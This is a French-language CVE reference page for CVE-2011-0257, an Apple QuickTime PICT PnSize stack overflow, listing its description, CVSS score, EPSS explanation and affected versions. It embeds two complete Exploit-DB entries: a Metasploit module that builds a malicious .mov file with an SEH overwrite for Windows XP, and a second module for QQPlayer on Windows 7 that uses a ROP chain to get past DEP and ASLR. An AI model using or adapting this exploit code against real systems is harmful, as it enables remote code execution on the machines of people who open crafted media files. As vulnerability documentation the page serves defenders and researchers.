Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Integer signedness error in Apple QuickTime before 7.7 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PnSize opcode in a PICT file that triggers a stack-based buffer overflow.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 17777
Date de publication : 2011-09-02 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime PICT PnSize Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
When opening a .mov file containing a specially crafted PnSize value, an attacker
may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 13691 $',
'References' =>
[
[ 'CVE', '2011-0257' ],
[ 'BID', '49144' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0
],
'Privileged' => false,
'DisclosureDate' => 'Aug 8 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]),
], self.class)
end
def exploit
trigger = rand_text_alpha_upper(3324)
trigger[2302, 8] = generate_seh_record(target.ret)
trigger[2310, payload.encoded.size] = payload.encoded
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
fd = File.open(path, "rb" )
sploit = fd.read(fd.stat.size)
fd.close
sploit << trigger
file_create(sploit)
end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt
Opcode Name Description Data Size (in bytes)
$0007 PnSize pen size (point) 4
Exploit Database EDB-ID : 18137
Date de publication : 2011-11-20 23h00 +00:00
Auteur : hellok
EDB Vérifié : No
# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845(lastest)
# Tested on: WIN7
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',
'Description' => %q{
This module exploits a vulnerability in QQPLAYER Player 3.2.
When opening a .mov file containing a specially crafted PnSize value, an attacker
may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hellok', #special thank corelanc0d3r for 'mona'
],
'References' =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "", #Memcpy
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 7', { 'Ret' => 0x67664cde } ],
],
'Privileged' => false,
'DisclosureDate' => '11 21 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]),
], self.class)
end
def exploit
# !mona rop
rop_gadgets =
[
0x00418007, # POP ECX # RETN (QQPlayer.exe)
0x12345678,
0x67664CE4,
0x01020304,
0x10203040,
0x22331122,
0x23456789,
0x00418007, # POP ECX # RETN (QQPlayer.exe)
0x00a9c18c, # <- *&VirtualProtect()
0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)
#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)
0x008cf099, # XCHG EAX,ESI # RETN
0x6497aaad, # POP EBP # RETN (avformat-52.dll)
0x100272bf, # ptr to 'call esp' (from i18nu.dll)
0x005fc00b, # POP EBX # RETN (QQPlayer.exe)
0x00000331, # <- change size to mark as executable if needed (-> ebx)
0x00418007, # POP ECX # RETN (QQPlayer.exe)
0x63d18000, # RW pointer (lpOldProtect) (-> ecx)
0x63d05001, # POP EDI # RETN (avutil-49.dll)
0x63d05002, # ROP NOP (-> edi)
0x008bf00b, # POP EDX # RETN (QQPlayer.exe)
0x00000040, # newProtect (0x40) (-> edx)
0x00468800, # POP EAX # RETN (QQPlayer.exe)
0x90909090, # NOPS (-> eax)
0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)
# rop chain generated by mona.py
# note : this chain may not work out of the box
# you may have to change order or fix some gadgets,
# but it should give you a head start
].pack("V*")
stackpivot = [target.ret].pack('L')
buffer =rand_text_alpha_upper(90)#2
buffer << rop_gadgets
buffer << payload.encoded
junk = rand_text_alpha_upper(2306 - buffer.length)
buffer << junk
buffer << stackpivot
buffer << rand_text_alpha_upper(3000)#3000
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
fd = File.open(path, "rb" )
sploit = fd.read(fd.stat.size)
fd.close
sploit << buffer
file_create(sploit)
end
end
Products Mentioned
Configuraton 0
Apple>>Quicktime >> Version To (including) 7.6.9
- Apple>>Quicktime >> Version - (Open CPE detail)
- Apple>>Quicktime >> Version 3 (Open CPE detail)
- Apple>>Quicktime >> Version 3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.8 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1.70 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.7 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.8 (Open CPE detail)
- Apple>>Quicktime >> Version 7.6.9 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.0
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.0
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.4
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.0
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.1
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.3.0
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.3.1
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.3.1.70
- Apple>>Quicktime >> Version 7.3.1.70 (Open CPE detail)
Apple>>Quicktime >> Version 7.4.0
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.4.1
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.4.5
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.4.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.5.0
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.5.5
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.5.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.0
- Apple>>Quicktime >> Version 7.6.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.1
- Apple>>Quicktime >> Version 7.6.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.2
- Apple>>Quicktime >> Version 7.6.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.5
- Apple>>Quicktime >> Version 7.6.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.6
- Apple>>Quicktime >> Version 7.6.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.7
- Apple>>Quicktime >> Version 7.6.7 (Open CPE detail)
Apple>>Quicktime >> Version 7.6.8
- Apple>>Quicktime >> Version 7.6.8 (Open CPE detail)
Apple>>Quicktime >> Version 7.66.71.0
- Apple>>Quicktime >> Version 7.66.71.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.67.75.0
- Apple>>Quicktime >> Version 7.67.75.0 (Open CPE detail)
Références
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A16059
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.